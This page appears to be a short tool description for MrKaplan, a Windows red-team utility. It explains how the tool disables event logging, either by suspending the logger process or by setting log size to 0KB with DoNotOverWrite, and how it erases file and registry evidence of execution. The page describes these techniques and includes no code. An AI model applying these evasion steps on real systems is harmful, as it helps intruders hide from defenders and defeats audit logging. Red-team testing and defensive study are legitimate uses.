MrKaplan: tool for red teamers to stay hidden by clearing evidence of execution
Mr.Kaplan
The biggest problem for any attacker is the windows event logger (ETW). Almost every famous blue teams agents (Sysmon, Wazuh, etc.) use it, which means that if you somehow disable this service no logs will be produced and nothing can trigger an alert for the blue teams. To disable it, you will need administrative privileges. In this page, I cover the methods implemented in MrKaplan to disable event logging and how to use them with MrKaplan.
MrKaplan is a tool aimed to help red teamers to stay hidden by clearing evidence of execution. It works by saving information such as the time it ran, a snapshot of files, and associating each evidence to the related user.
This tool is inspired by MoonWalk, a similar tool for Unix machines.
Methods available
Suspending the event logger’s process
This is a common and easy way to stop event logging – just suspend the process that is responsible for the ETW. It can be done easily with a WMI query and NtSuspendProcess. The service won’t try to wake up the process (since it is running) and it won’t log any events – A win-win situation for any attacker.
Overwrite event logging settings
The second method is my favorite but it comes with a sting – When it is used and until clean up no regular user can be logged in to the station. For this method, MrKaplan (ab)uses a mechanism in windows that allow to limit the size of logs that can be created on a computer. To stop the ETW, everything that needs to be done is to set the registry value to 0KB and the operation to DoNotOverWrite – this part is important! By default, new logs will overwrite the old ones but with the DoNotOverWrite flag you can bypass that and no logs will be created.
Features
- Stopping event logging.
- Clearing files artifacts.
- Clearing registry artifacts.
- Can run for multiple users.
- Can run as user and as admin (Highly recommended to run as admin).
- Can save timestamps of files.
- Can exclude certain operations and leave artifacts to blue teams.
Download & Use
Copyright (c) 2022, Ido Veltzman
All rights reserved.
